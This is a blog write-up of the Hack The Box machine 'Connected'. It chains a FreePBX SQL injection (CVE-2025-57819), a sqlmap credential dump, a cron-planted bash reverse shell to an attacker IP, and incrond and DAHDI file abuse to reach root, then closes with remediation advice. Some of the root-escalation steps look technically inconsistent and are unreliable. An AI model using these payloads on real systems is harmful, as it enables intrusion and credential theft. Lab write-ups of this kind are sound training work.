Back to blog
#HTB#SQLi#FreePBX#CVE-2025-57819#Privesc#Linux#Write-up

HTB Connected — SQLi on FreePBX to Root Access (CVE-2025-57819)

LLLEBONI BAKLA Lionel•📅 June 22, 2026• ⏱️ 14 min

Connected — Hack The Box (Enterprise / Yaoundé Meetup, June 2026) Difficulty: Hard • Tags: VoIP, FreePBX, SQLi, Cron, incrond, DAHDI

Full Attack Chain

Exposed FreePBX → SQLi (CVE-2025-57819) → admin creds
   → vulnerable module → RCE via Cron
   → incrond daemon abuse → DAHDI poisoning → root

Initial Enumeration

nmap -sV -sC -p- 10.10.11.x

Interesting ports:

  • 22 — SSH
  • 80 — HTTP (FreePBX)
  • 443 — HTTPS

FreePBX is the web administration interface for Asterisk, the famous open-source PBX. A classic target in VoIP.

Access — CVE-2025-57819 (FreePBX SQLi)

A quick search on FreePBX + SQLi brings up CVE-2025-57819, an unauthenticated SQL injection on a specific endpoint.

Proof of concept

# Vulnerable endpoint
curl "http://10.10.11.x/admin/config.php?display=users&ID=1"

The ID parameter is injectable. We confirm with a time-based payload:

1 AND (SELECT SLEEP(5) FROM dual)

→ Response in 5 seconds. SQLi confirmed.

Dump with sqlmap

sqlmap -u "http://10.10.11.x/admin/config.php?display=users&ID=1" \
  --dbms=mysql --dump --batch

We retrieve the FreePBX administrator credentials. We log into the admin interface.

RCE via Cron

Once FreePBX admin, several modules allow command execution. The chosen vector: a module that schedules tasks via cron.

We inject our payload into a field that ends up in /etc/cron.d/:

# Scheduled reverse shell
* * * * * root bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'
# Listener
nc -lvnp 4444

One minute later — shell as the asterisk user. ✅

Privilege Escalation — Abusing the incrond Daemon

incrond (inotify cron) is a service that executes commands when filesystem events occur. On the machine, it runs as root and watches a writable directory.

We look at the rules:

cat /etc/incron.d/*

A rule triggers a script every time a *.cfg file is modified. We have write access to the watched directory.

# We create/modify the file to trigger execution
echo "trigger" > /opt/asterisk/configs/trigger.cfg

The triggered script is exploitable — but it is read-only. We need another vector.

DAHDI Poisoning — Definitive Root

DAHDI (Digium Asterisk Hardware Device Interface) is Asterisk’s hardware driver. It loads its configuration from a specific file, and this configuration can execute commands in certain contexts.

We discover that /etc/dahdi/modules is included by a root process and that we can inject via the incrond → DAHDI chain:

  1. We trigger incrond by writing to the watched directory
  2. The child script reads a DAHDI file we control
  3. This file is interpreted by the root process → we get root execution
# Final DAHDI payload
echo 'root:$(chmod u+s /bin/bash)' >> /etc/dahdi/modules
# Trigger via incrond
touch /opt/asterisk/configs/trigger.cfg
sleep 2
/bin/bash -p
whoami  # root

Root shell. 🎯

Remediation

Vector Fix
Unauthenticated SQLi (CVE-2025-57819) Immediate patch — upgrade FreePBX
Writable cron Strict permissions on /etc/cron.d/
incrond as root Minimal privileges, watch read-only folders
Configurable DAHDI Root-only permissions on /etc/dahdi/
Exposed VoIP Filter ports, never expose admin publicly

Lessons Learned

  1. PBX systems are underrated targets. Few auditors think of testing FreePBX, Asterisk, 3CX — yet CVEs keep piling up.
  2. Root “system” daemons are dangerous. incrond, daemontools, supervisord… all can become privesc vectors if they read modifiable files.
  3. Attack chains = patience. Here, 4 distinct steps. Each alone is not enough — it’s the chaining that gets root.

Conclusion

A difficult but pedagogically brilliant machine. It shows how a single entry vulnerability (the SQLi) can, on a poorly hardened machine, lead all the way to root via a chain of four successive abuses.

“Finding the entry door is good. Opening it all the way to the throne is better.”

About the author

LEBONI BAKLA Lionel — Cybersecurity & Applied AI Engineer. Ethical Hacker • Bug Hunter • Junior DevSecOps • FullStack Developer.